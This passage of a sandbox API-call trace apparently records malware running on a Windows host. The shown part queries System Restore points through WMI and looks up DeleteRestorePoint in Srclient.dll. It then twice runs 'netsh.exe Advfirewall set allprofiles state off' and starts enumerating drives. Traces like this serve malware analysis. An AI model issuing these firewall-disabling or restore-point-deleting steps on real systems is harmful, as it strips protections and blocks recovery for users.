[1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e3f0 | out: ppvObject=0x41e3f0*=0x0) returned 0x80004002 [0116.741] WbemDefPath:IUnknown:AddRef (This=0x67384d0) returned 0x3 [0116.741] WbemDefPath:IUnknown:QueryInterface (in: This=0x67384d0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dd4c | out: ppvObject=0x41dd4c*=0x0) returned 0x80004002 [0116.741] WbemDefPath:IUnknown:QueryInterface (in: This=0x67384d0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dcfc | out: ppvObject=0x41dcfc*=0x0) returned 0x80004002 [0116.742] WbemDefPath:IUnknown:QueryInterface (in: This=0x67384d0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dd08 | out: ppvObject=0x41dd08*=0x77c558) returned 0x0 [0116.742] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77c558, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dd10 | out: pCid=0x41dd10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0116.742] WbemDefPath:IUnknown:Release (This=0x77c558) returned 0x3 [0116.742] CoGetContextToken (in: pToken=0x41dd68 | out: pToken=0x41dd68) returned 0x0 [0116.742] CoGetContextToken (in: pToken=0x41e170 | out: pToken=0x41e170) returned 0x0 [0116.742] WbemDefPath:IUnknown:QueryInterface (in: This=0x67384d0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e200 | out: ppvObject=0x41e200*=0x0) returned 0x80004002 [0116.742] WbemDefPath:IUnknown:Release (This=0x67384d0) returned 0x2 [0116.742] WbemDefPath:IUnknown:Release (This=0x67384d0) returned 0x1 [0116.742] CoGetContextToken (in: pToken=0x41eaf8 | out: pToken=0x41eaf8) returned 0x0 [0116.742] CoGetContextToken (in: pToken=0x41ea58 | out: pToken=0x41ea58) returned 0x0 [0116.742] WbemDefPath:IUnknown:QueryInterface (in: This=0x67384d0, riid=0x41eb28*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x41eb24 | out: ppvObject=0x41eb24*=0x67384d0) returned 0x0 [0116.742] WbemDefPath:IUnknown:AddRef (This=0x67384d0) returned 0x3 [0116.742] WbemDefPath:IUnknown:Release (This=0x67384d0) returned 0x2 [0116.742] WbemDefPath:IWbemPath:SetText (This=0x67384d0, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=24") returned 0x0 [0116.743] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41eca8 | out: puCount=0x41eca8*=0x2) returned 0x0 [0116.743] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x0, pszText=0x0 | out: puBuffLength=0x41eca4*=0x11, pszText=0x0) returned 0x0 [0116.743] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41eca4*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.743] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41ec74 | out: puCount=0x41ec74*=0x2) returned 0x0 [0116.743] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x0, pszText=0x0 | out: puBuffLength=0x41ec70*=0x11, pszText=0x0) returned 0x0 [0116.743] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41ec70*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.743] IWbemClassObject:Get (in: This=0x673bf90, wszName="sequencenumber", lFlags=0, pVal=0x41ec70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x35321d0*=0, plFlavor=0x35321d4*=0 | out: pVal=0x41ec70*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x18, varVal2=0x0), pType=0x35321d0*=19, plFlavor=0x35321d4*=0) returned 0x0 [0116.743] IWbemClassObject:Get (in: This=0x673bf90, wszName="sequencenumber", lFlags=0, pVal=0x41ec78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x35321d0*=19, plFlavor=0x35321d4*=0 | out: pVal=0x41ec78*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x18, varVal2=0x0), pType=0x35321d0*=19, plFlavor=0x35321d4*=0) returned 0x0 [0116.743] CoTaskMemAlloc (cb=0x4) returned 0x77c598 [0116.743] IEnumWbemClassObject:Next (in: This=0x6736ac4, lTimeout=-1, uCount=0x1, apObjects=0x77c598, puReturned=0x3526b58 | out: apObjects=0x77c598*=0x673c128, puReturned=0x3526b58*=0x1) returned 0x0 [0118.318] IUnknown:QueryInterface (in: This=0x673c128, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e2e0 | out: ppvObject=0x41e2e0*=0x673c128) returned 0x0 [0118.319] IUnknown:QueryInterface (in: This=0x673c128, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e29c | out: ppvObject=0x41e29c*=0x0) returned 0x80004002 [0118.319] IUnknown:QueryInterface (in: This=0x673c128, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e0bc | out: ppvObject=0x41e0bc*=0x0) returned 0x80004002 [0118.319] IUnknown:AddRef (This=0x673c128) returned 0x3 [0118.319] IUnknown:QueryInterface (in: This=0x673c128, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dbfc | out: ppvObject=0x41dbfc*=0x0) returned 0x80004002 [0118.319] IUnknown:QueryInterface (in: This=0x673c128, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dbac | out: ppvObject=0x41dbac*=0x0) returned 0x80004002 [0118.319] IUnknown:QueryInterface (in: This=0x673c128, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dbb8 | out: ppvObject=0x41dbb8*=0x673c12c) returned 0x0 [0118.319] IMarshal:GetUnmarshalClass (in: This=0x673c12c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dbc0 | out: pCid=0x41dbc0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0118.319] IUnknown:Release (This=0x673c12c) returned 0x3 [0118.319] CoGetContextToken (in: pToken=0x41dc18 | out: pToken=0x41dc18) returned 0x0 [0118.319] CoGetContextToken (in: pToken=0x41e020 | out: pToken=0x41e020) returned 0x0 [0118.319] IUnknown:QueryInterface (in: This=0x673c128, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e0b0 | out: ppvObject=0x41e0b0*=0x0) returned 0x80004002 [0118.319] IUnknown:Release (This=0x673c128) returned 0x2 [0118.320] CoGetContextToken (in: pToken=0x41e5f0 | out: pToken=0x41e5f0) returned 0x0 [0118.320] CoGetContextToken (in: pToken=0x41e550 | out: pToken=0x41e550) returned 0x0 [0118.320] IUnknown:QueryInterface (in: This=0x673c128, riid=0x41e620*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x41e61c | out: ppvObject=0x41e61c*=0x673c128) returned 0x0 [0118.320] IUnknown:AddRef (This=0x673c128) returned 0x4 [0118.320] IUnknown:Release (This=0x673c128) returned 0x3 [0118.320] IUnknown:Release (This=0x673c128) returned 0x2 [0118.320] CoTaskMemFree (pv=0x77c598) [0118.320] CoGetContextToken (in: pToken=0x41e958 | out: pToken=0x41e958) returned 0x0 [0118.320] IUnknown:AddRef (This=0x673c128) returned 0x3 [0118.320] IWbemClassObject:Get (in: This=0x673c128, wszName="__GENUS", lFlags=0, pVal=0x41ec6c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecec*=0, plFlavor=0x41ece8*=0 | out: pVal=0x41ec6c*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x41ecec*=3, plFlavor=0x41ece8*=64) returned 0x0 [0118.320] IWbemClassObject:Get (in: This=0x673c128, wszName="__PATH", lFlags=0, pVal=0x41ec50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecd4*=0, plFlavor=0x41ecd0*=0 | out: pVal=0x41ec50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=25", varVal2=0x0), pType=0x41ecd4*=8, plFlavor=0x41ecd0*=64) returned 0x0 [0118.320] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=25") returned 0x70 [0118.320] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=25") returned 0x70 [0118.321] CoGetObjectContext (in: riid=0x346e308*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41ec7c | out: ppv=0x41ec7c*=0x72015c) returned 0x0 [0118.321] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x41ec74 | out: pAptType=0x41ec74*=1) returned 0x0 [0118.321] IUnknown:QueryInterface (in: This=0x72015c, riid=0x346e2f0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x41ec78 | out: ppvObject=0x41ec78*=0x0) returned 0x80004002 [0118.321] IUnknown:Release (This=0x72015c) returned 0x1 [0118.324] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41e5e8 | out: ppv=0x41e5e8*=0x6736ed8) returned 0x0 [0118.369] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736ed8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e800 | out: ppvObject=0x41e800*=0x0) returned 0x80004002 [0118.369] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736ed8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e814 | out: ppvObject=0x41e814*=0x6738540) returned 0x0 [0118.369] WbemDefPath:IUnknown:Release (This=0x6736ed8) returned 0x0 [0118.370] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738540, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e434 | out: ppvObject=0x41e434*=0x6738540) returned 0x0 [0118.370] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738540, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e3f0 | out: ppvObject=0x41e3f0*=0x0) returned 0x80004002 [0118.370] WbemDefPath:IUnknown:AddRef (This=0x6738540) returned 0x3 [0118.370] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738540, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dd4c | out: ppvObject=0x41dd4c*=0x0) returned 0x80004002 [0118.370] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738540, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dcfc | out: ppvObject=0x41dcfc*=0x0) returned 0x80004002 [0118.370] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738540, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dd08 | out: ppvObject=0x41dd08*=0x77c598) returned 0x0 [0118.370] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77c598, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dd10 | out: pCid=0x41dd10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0118.370] WbemDefPath:IUnknown:Release (This=0x77c598) returned 0x3 [0118.370] CoGetContextToken (in: pToken=0x41dd68 | out: pToken=0x41dd68) returned 0x0 [0118.370] CoGetContextToken (in: pToken=0x41e170 | out: pToken=0x41e170) returned 0x0 [0118.370] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738540, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e200 | out: ppvObject=0x41e200*=0x0) returned 0x80004002 [0118.370] WbemDefPath:IUnknown:Release (This=0x6738540) returned 0x2 [0118.371] WbemDefPath:IUnknown:Release (This=0x6738540) returned 0x1 [0118.371] CoGetContextToken (in: pToken=0x41eaf8 | out: pToken=0x41eaf8) returned 0x0 [0118.371] CoGetContextToken (in: pToken=0x41ea58 | out: pToken=0x41ea58) returned 0x0 [0118.371] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738540, riid=0x41eb28*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x41eb24 | out: ppvObject=0x41eb24*=0x6738540) returned 0x0 [0118.371] WbemDefPath:IUnknown:AddRef (This=0x6738540) returned 0x3 [0118.371] WbemDefPath:IUnknown:Release (This=0x6738540) returned 0x2 [0118.371] WbemDefPath:IWbemPath:SetText (This=0x6738540, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=25") returned 0x0 [0118.371] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41eca8 | out: puCount=0x41eca8*=0x2) returned 0x0 [0118.371] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x0, pszText=0x0 | out: puBuffLength=0x41eca4*=0x11, pszText=0x0) returned 0x0 [0118.371] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41eca4*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0118.371] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41ec74 | out: puCount=0x41ec74*=0x2) returned 0x0 [0118.371] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x0, pszText=0x0 | out: puBuffLength=0x41ec70*=0x11, pszText=0x0) returned 0x0 [0118.371] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41ec70*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0118.371] IWbemClassObject:Get (in: This=0x673c128, wszName="sequencenumber", lFlags=0, pVal=0x41ec70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3532a20*=0, plFlavor=0x3532a24*=0 | out: pVal=0x41ec70*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x19, varVal2=0x0), pType=0x3532a20*=19, plFlavor=0x3532a24*=0) returned 0x0 [0118.372] IWbemClassObject:Get (in: This=0x673c128, wszName="sequencenumber", lFlags=0, pVal=0x41ec78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3532a20*=19, plFlavor=0x3532a24*=0 | out: pVal=0x41ec78*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x19, varVal2=0x0), pType=0x3532a20*=19, plFlavor=0x3532a24*=0) returned 0x0 [0118.372] CoTaskMemAlloc (cb=0x4) returned 0x7ae370 [0118.372] IEnumWbemClassObject:Next (in: This=0x6736ac4, lTimeout=-1, uCount=0x1, apObjects=0x7ae370, puReturned=0x3526b58 | out: apObjects=0x7ae370*=0x0, puReturned=0x3526b58*=0x0) returned 0x1 [0118.624] CoTaskMemFree (pv=0x7ae370) [0118.656] CoGetContextToken (in: pToken=0x41eba8 | out: pToken=0x41eba8) returned 0x0 [0118.656] WbemLocator:IUnknown:Release (This=0x780ed4) returned 0x1 [0118.661] IUnknown:Release (This=0x6736ac4) returned 0x0 [0118.746] SysReAllocStringLen (in: pbstr=0x41e0d4*=0x0, psz="Srclient.dll", len=0xc | out: pbstr=0x41e0d4*="Srclient.dll") returned 1 [0118.746] CharLowerBuffW (in: lpsz="Srclient.dll", cchLength=0xc | out: lpsz="srclient.dll") returned 0xc [0118.746] LoadLibraryExW (lpLibFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Srclient.dll", hFile=0x0, dwFlags=0x8) returned 0x0 [0118.746] GetLastError () returned 0x7e [0118.746] SetLastError (dwErrCode=0x7e) [0118.749] SysReAllocStringLen (in: pbstr=0x41e0d4*=0x0, psz="Srclient.dll", len=0xc | out: pbstr=0x41e0d4*="Srclient.dll") returned 1 [0118.749] CharLowerBuffW (in: lpsz="Srclient.dll", cchLength=0xc | out: lpsz="srclient.dll") returned 0xc [0118.749] LoadLibraryExW (lpLibFileName="Srclient.dll", hFile=0x0, dwFlags=0x0) returned 0x750c0000 [0119.399] GetLastError () returned 0x0 [0119.400] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e0bc*=0x750c1060, NumberOfBytesToProtect=0x41e0c0, NewAccessProtection=0x4, OldAccessProtection=0x41e0f4 | out: BaseAddress=0x41e0bc*=0x750c1000, NumberOfBytesToProtect=0x41e0c0, OldAccessProtection=0x41e0f4*=0x20) returned 0x0 [0119.400] GetCurrentProcess () returned 0xffffffff [0119.400] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e0bc*=0x750c1060, NumberOfBytesToProtect=0x41e0c0, NewAccessProtection=0x20, OldAccessProtection=0x41e0f4 | out: BaseAddress=0x41e0bc*=0x750c1000, NumberOfBytesToProtect=0x41e0c0, OldAccessProtection=0x41e0f4*=0x4) returned 0x0 [0119.401] GetCurrentProcess () returned 0xffffffff [0119.401] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e0bc*=0x750c1068, NumberOfBytesToProtect=0x41e0c0, NewAccessProtection=0x4, OldAccessProtection=0x41e0f4 | out: BaseAddress=0x41e0bc*=0x750c1000, NumberOfBytesToProtect=0x41e0c0, OldAccessProtection=0x41e0f4*=0x20) returned 0x0 [0119.401] GetCurrentProcess () returned 0xffffffff [0119.401] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e0bc*=0x750c1068, NumberOfBytesToProtect=0x41e0c0, NewAccessProtection=0x20, OldAccessProtection=0x41e0f4 | out: BaseAddress=0x41e0bc*=0x750c1000, NumberOfBytesToProtect=0x41e0c0, OldAccessProtection=0x41e0f4*=0x4) returned 0x0 [0119.401] GetCurrentProcess () returned 0xffffffff [0119.401] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e0bc*=0x750c10b0, NumberOfBytesToProtect=0x41e0c0, NewAccessProtection=0x4, OldAccessProtection=0x41e0f4 | out: BaseAddress=0x41e0bc*=0x750c1000, NumberOfBytesToProtect=0x41e0c0, OldAccessProtection=0x41e0f4*=0x20) returned 0x0 [0119.402] GetCurrentProcess () returned 0xffffffff [0119.402] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e0bc*=0x750c10b0, NumberOfBytesToProtect=0x41e0c0, NewAccessProtection=0x20, OldAccessProtection=0x41e0f4 | out: BaseAddress=0x41e0bc*=0x750c1000, NumberOfBytesToProtect=0x41e0c0, OldAccessProtection=0x41e0f4*=0x4) returned 0x0 [0119.403] GetProcAddress (hModule=0x750c0000, lpProcName="DeleteRestorePoint") returned 0x0 [0119.403] GetProcAddress (hModule=0x750c0000, lpProcName="DeleteRestorePointA") returned 0x0 [0119.403] SysReAllocStringLen (in: pbstr=0x41e844*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x41e844*="kernel32.dll") returned 1 [0119.403] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0119.404] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0119.406] GetProcAddress (hModule=0x750c0000, lpProcName="_DeleteRestorePoint@4") returned 0x0 [0119.421] CoTaskMemAlloc (cb=0x20e) returned 0x7a5f90 [0119.421] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x7a5f90 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0119.421] CoTaskMemFree (pv=0x7a5f90) [0119.421] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"netsh.exe\" Advfirewall set allprofiles state off", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x41eb34*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3532f30 | out: lpCommandLine="\"netsh.exe\" Advfirewall set allprofiles state off", lpProcessInformation=0x3532f30*(hProcess=0x47c, hThread=0x478, dwProcessId=0xa70, dwThreadId=0xa5c)) returned 1 [0119.474] CloseHandle (hObject=0x478) returned 1 [0119.474] CloseHandle (hObject=0x47c) returned 1 [0119.474] CoTaskMemAlloc (cb=0x20e) returned 0x7a5f90 [0119.474] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x7a5f90 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0119.474] CoTaskMemFree (pv=0x7a5f90) [0119.475] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"netsh.exe\" Advfirewall set allprofiles state off", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x41eb44*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3533530 | out: lpCommandLine="\"netsh.exe\" Advfirewall set allprofiles state off", lpProcessInformation=0x3533530*(hProcess=0x478, hThread=0x47c, dwProcessId=0x38c, dwThreadId=0x6a0)) returned 1 [0119.480] CloseHandle (hObject=0x47c) returned 1 [0124.701] GetLogicalDrives () returned 0x4 [0124.702] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x41e744, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0128.231] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x41ec2c) returned 1 [0128.231] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x41eca8 | out: lpFileInformation=0x41eca8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0128.231] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x41ec28) returned 1 [0128.335] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x41ecac) returned 1 [0128.337] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x41e7b4, lpFilePart=0x0 | out: 